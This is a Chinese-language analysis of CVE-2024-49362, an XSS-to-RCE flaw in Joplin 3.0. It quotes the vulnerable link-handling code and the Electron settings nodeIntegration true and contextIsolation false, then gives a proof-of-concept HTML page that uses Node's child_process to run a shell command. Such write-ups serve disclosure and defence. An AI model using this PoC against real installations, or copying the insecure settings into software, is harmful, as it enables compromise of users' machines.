CVE-2024-49362 Joplin XSS2RCE漏洞分析

CVE-2024-49362

影响版本

joplin 3.0版本

原理

带有 data-from-md 属性的<a href=xxx> 链接会被直接解析.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
document.addEventListener('click', (event) => {
        const anchor = webviewLib.getParentAnchorElement(event.target);
        if (!anchor) return;

        if (!anchor.hasAttribute('data-from-md')) {
                if (webviewLib.handleInternalLink(event, anchor)) return;
                event.preventDefault();
                if (anchor.getAttribute('href')) webviewLib.options_.postMessage(anchor.getAttribute('href'));
                if (anchor.getAttribute('xlink:href')) webviewLib.options_.postMessage(anchor.getAttribute('xlink:href'));
                return;
        }
        // If this is an internal link, jump to the anchor directly
        if (anchor.hasAttribute('data-from-md')) {
                if (webviewLib.handleInternalLink(event, anchor)) return;
        }
});
1
2
3
4
5
6
7
8
9
10
11
12
webviewLib.handleInternalLink = function(event, anchorNode) {
        const href = anchorNode.getAttribute('href');
        if (!href) return false;

        if (href.indexOf('#') === 0) {
                event.preventDefault();
                location.hash = href;
                return true;
        }

        return false;
};

Electron安全配置中配置了nodeIntergration为true和contextIsolation为false,渲染器进程拥有完全的nodejs API访问能力.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
const windowOptions: any = {
                        x: windowState.x,
                        y: windowState.y,
                        width: windowState.width,
                        height: windowState.height,
                        minWidth: 100,
                        minHeight: 100,
                        backgroundColor: '#fff', // required to enable sub pixel rendering, can't be in css
                        webPreferences: {
                                nodeIntegration: true,
                                contextIsolation: false,
                                spellcheck: true,
                                enableRemoteModule: true,
                        },
                        webviewTag: true,

漏洞复现

poc2.html

利用Node.js API获取系统级别命令执行(RCE)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<html>
  <body>
    <script>
      if (typeof window.parent.require !== 'undefined') {
        const { exec } = window.parent.require('child_process');
        exec('ls -al', (err, stdout, stderr) => {
          if (err) {
            document.body.innerText = `Error: ${err.message}`;
            return;
          }
          if (stderr) {
            document.body.innerText = `Stderr: ${stderr}`;
            return;
          }
          document.body.innerText = stdout;
        });
      } else {
        document.body.innerText = 'Require is not available in this environment.';
      }
    </script>
  </body>
</html>

参考链接

https://github.com/advisories/GHSA-hff8-hjwv-j9q7